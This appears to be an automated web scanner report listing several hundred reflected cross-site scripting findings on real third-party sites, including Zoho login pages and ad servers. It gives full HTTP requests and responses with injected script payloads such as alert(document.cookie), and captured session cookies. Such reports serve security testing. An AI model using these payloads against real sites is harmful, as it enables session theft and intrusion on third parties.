1.705. http://www.watchmouse.com/pl/website_monitoring_features.php [REST URL parameter 1]

1.706. http://www.watchmouse.com/pl/website_monitoring_features.php [REST URL parameter 2]

1.707. http://www.watchmouse.com/pl/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.708. http://www.watchmouse.com/profile.php [REST URL parameter 1]

1.709. http://www.watchmouse.com/profile.php [name of an arbitrarily supplied request parameter]

1.710. http://www.watchmouse.com/pt/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.711. http://www.watchmouse.com/pt/ [REST URL parameter 1]

1.712. http://www.watchmouse.com/pt/ [name of an arbitrarily supplied request parameter]

1.713. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 1]

1.714. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 2]

1.715. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 3]

1.716. http://www.watchmouse.com/pt/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.717. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 1]

1.718. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 2]

1.719. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 3]

1.720. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

1.721. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.722. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.723. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.724. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.725. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 1]

1.726. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 2]

1.727. http://www.watchmouse.com/pt/learn_more.php [name of an arbitrarily supplied request parameter]

1.728. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 1]

1.729. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 2]

1.730. http://www.watchmouse.com/pt/plans_price.php [name of an arbitrarily supplied request parameter]

1.731. http://www.watchmouse.com/pt/register.php [REST URL parameter 1]

1.732. http://www.watchmouse.com/pt/register.php [REST URL parameter 2]

1.733. http://www.watchmouse.com/pt/register.php [name of an arbitrarily supplied request parameter]

1.734. http://www.watchmouse.com/pt/website_monitoring_features.php [REST URL parameter 1]

1.735. http://www.watchmouse.com/pt/website_monitoring_features.php [REST URL parameter 2]

1.736. http://www.watchmouse.com/pt/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.737. http://www.watchmouse.com/pubstatus.php [REST URL parameter 1]

1.738. http://www.watchmouse.com/pubstatus.php [name of an arbitrarily supplied request parameter]

1.739. http://www.watchmouse.com/settings.php [REST URL parameter 1]

1.740. http://www.watchmouse.com/settings.php [name of an arbitrarily supplied request parameter]

1.741. http://www.watchmouse.com/sv/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.742. http://www.watchmouse.com/sv/ [REST URL parameter 1]

1.743. http://www.watchmouse.com/sv/ [name of an arbitrarily supplied request parameter]

1.744. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 1]

1.745. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 2]

1.746. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 3]

1.747. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 1]

1.748. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 2]

1.749. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 3]

1.750. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.751. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.752. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.753. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.754. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 1]

1.755. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 2]

1.756. http://www.watchmouse.com/sv/learn_more.php [name of an arbitrarily supplied request parameter]

1.757. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 1]

1.758. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 2]

1.759. http://www.watchmouse.com/sv/plans_price.php [name of an arbitrarily supplied request parameter]

1.760. http://www.watchmouse.com/sv/register.php [REST URL parameter 1]

1.761. http://www.watchmouse.com/sv/register.php [REST URL parameter 2]

1.762. http://www.watchmouse.com/sv/register.php [name of an arbitrarily supplied request parameter]

1.763. http://www.watchmouse.com/sv/website_monitoring_features.php [REST URL parameter 1]

1.764. http://www.watchmouse.com/sv/website_monitoring_features.php [REST URL parameter 2]

1.765. http://www.watchmouse.com/sv/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.766. http://www.watchmouse.com/trial.php [REST URL parameter 1]

1.767. http://www.watchmouse.com/trial.php [name of an arbitrarily supplied request parameter]

1.768. http://www.watchmouse.com/w3c/p3p.xml [REST URL parameter 1]

1.769. http://www.watchmouse.com/worldwide.php [REST URL parameter 1]

1.770. http://www.watchmouse.com/worldwide.php [name of an arbitrarily supplied request parameter]

1.771. http://xhtml.co.il/he/page-700/jQuery [72f1f'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb977444cfbf parameter]

1.772. http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter]

1.773. http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82 [name of an arbitrarily supplied request parameter]

1.774. http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82 [name of an arbitrarily supplied request parameter]

1.775. http://xhtml.co.il/ru/page-1013/jQuery.browser [2baaa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E50c1d38299f parameter]

1.776. http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter]

1.777. http://coderseye.com/2007/semitransparent-rollovers-made-easy-with-jquery.html [Referer HTTP header]

1.778. http://ib.adnxs.com/ttj [Referer HTTP header]

1.779. https://secure.watchmouse.com/en/ [Referer HTTP header]

1.780. https://secure.watchmouse.com/en/index.php [Referer HTTP header]

1.781. https://secure.watchmouse.com/en/learn_more.php [Referer HTTP header]

1.782. https://secure.watchmouse.com/en/plans_price.php [Referer HTTP header]

1.783. https://secure.watchmouse.com/en/website_monitoring_features.php [Referer HTTP header]

1.784. https://accounts.zoho.com/login [iamcsr cookie]

1.785. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.786. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.787. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.788. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

1.789. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.790. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.791. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.792. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]



1. Cross-site scripting (reflected)
There are 792 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.rfihub.com/sed [pa parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19cb2'><script>alert(1)</script>9b01dc2c9cc was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'><script>alert(1)</script>9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; b="aAJ2iVhfw==AD809AAABLgBphCs=AD825AAABLgBphCs=AD736AAABLgBphCs=AD829AAABLgBphCs=AD748AAABLgBphCs=AD801AAABLgBphCs=AD773AAABLgBphCs=AD805AAABLgBphCs=AD747AAABLgBphCs="; m="aADZqFZGg==AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAD7LeeHw==A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; c="aAYKNo-Sw==AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGt11341AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aADZiQHPw==AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAEOLfHoQ==AE9479AN1294103956000AAABLgCILYI=AE9438AN1273618082000AAABLgBpdhw=AF12446AN1285279980000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAElhzkBQ==A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: c="aAfAlZ4YQ==AFd1243AB1AAABLgq3o_Y=AFv2946AB1AAABLgq3o_Y=AGu14941AB1AAABLgq3o_Y=AFc1243AB1AAABLgq3o_Y=AFl2946AB1AAABLgq3o_Y=AGt14941AB1AAABLgq3o_Y=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: f="aAE82cUpg==AK1297259930AB1AAABLgq3o_Y=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Content-Length: 2495

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259930614;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,2pwDXuoO-PeR,http%3A%2F%2Frocketfuelinc.com,776,2946,32521,1879,7792&pa=ppre259932283447419cb2'><script>alert(1)</script>9b01dc2c9cc&id=&ra=2599306180.2252382552959169'>
...[SNIP]...

1.2. https://accounts.zoho.com/login [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed7ba'><a%20b%3dc>0cf1f1b2316 was submitted in the serviceurl parameter. This input was echoed as ed7ba'><a b=c>0cf1f1b2316 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login?service_language=en&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.comed7ba'><a%20b%3dc>0cf1f1b2316 HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=a0ec328f-8bec-4c46-a791-8964eb816737; Path=/
Set-Cookie: JSESSIONID=CB4051B3AB16743E7C94E52DB96587FE; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:26:59 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://forum.jquery.comed7ba'><a b=c>0cf1f1b2316' type="hidden">
...[SNIP]...

1.3. https://accounts.zoho.com/login [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac40'%3b70efc06911b was submitted in the serviceurl parameter. This input was echoed as 3ac40';70efc06911b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=en&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com3ac40'%3b70efc06911b HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=77dab029-8f0e-499c-8d04-0838b882f244; Path=/
Set-Cookie: JSESSIONID=2A2C97CEE6A9253EB52A572CA0CFC694; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:03 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}


var enableReload = true;
var serviceurl = 'http://forum.jquery.com3ac40';70efc06911b';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

1.4. https://accounts.zoho.com/register [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca76"><a%20b%3dc>2982c3121fe was submitted in the css parameter. This input was echoed as bca76"><a b=c>2982c3121fe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.cssbca76"><a%20b%3dc>2982c3121fe HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=c5977962-a28d-4995-a591-f519e883d6a5; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258030432; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=801D3E9A0899D0D113269D9B7DA9CD76; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:09 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<link href="http://discussions.zoho.com/styles/iamregister.cssbca76"><a b=c>2982c3121fe" type="text/css" rel="stylesheet" />
...[SNIP]...

1.5. https://accounts.zoho.com/register [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e39'%3b8e066d4099 was submitted in the serviceurl parameter. This input was echoed as a0e39';8e066d4099 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003a0e39'%3b8e066d4099&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=d1ac3184-af9a-4c9a-b6f3-0bcde1493894; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258025823; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=AAA8FA9883A6924EB93D1CBD72502D9A; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:04 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
var validChars = /^[A-Za-z0-9_\.]+$/;
var onlyNumbers = /^[0-9]+$/
var serviceurl = 'http://discussions.zoho.com/forumHome.do?forumGroupURL=jquery&referrer=signUp&forumGroupId=14737000000003003a0e39';8e066d4099';
var servicename ='ZohoDiscussions';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=d1ac3184-af9a-4c9a-b6f3-0bcde1493894';

function de(
...[SNIP]...

1.6. https://accounts.zoho.com/register [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8b37'><a%20b%3dc>27f14c732a9 was submitted in the serviceurl parameter. This input was echoed as a8b37'><a b=c>27f14c732a9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003a8b37'><a%20b%3dc>27f14c732a9&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=990090bc-9688-4b39-b67b-38ae0c2f2279; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258021715; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=485D2FB98BA6B08CBC3552D5F7C106A2; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:01 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<input name="serviceurl" value='http://discussions.zoho.com/forumHome.do?forumGroupURL=jquery&referrer=signUp&forumGroupId=14737000000003003a8b37'><a b=c>27f14c732a9' type="hidden">
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f95"-alert(1)-"7b5fb722fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259897490;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&47f95"-alert(1)-"7b5fb722fd8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:22 GMT
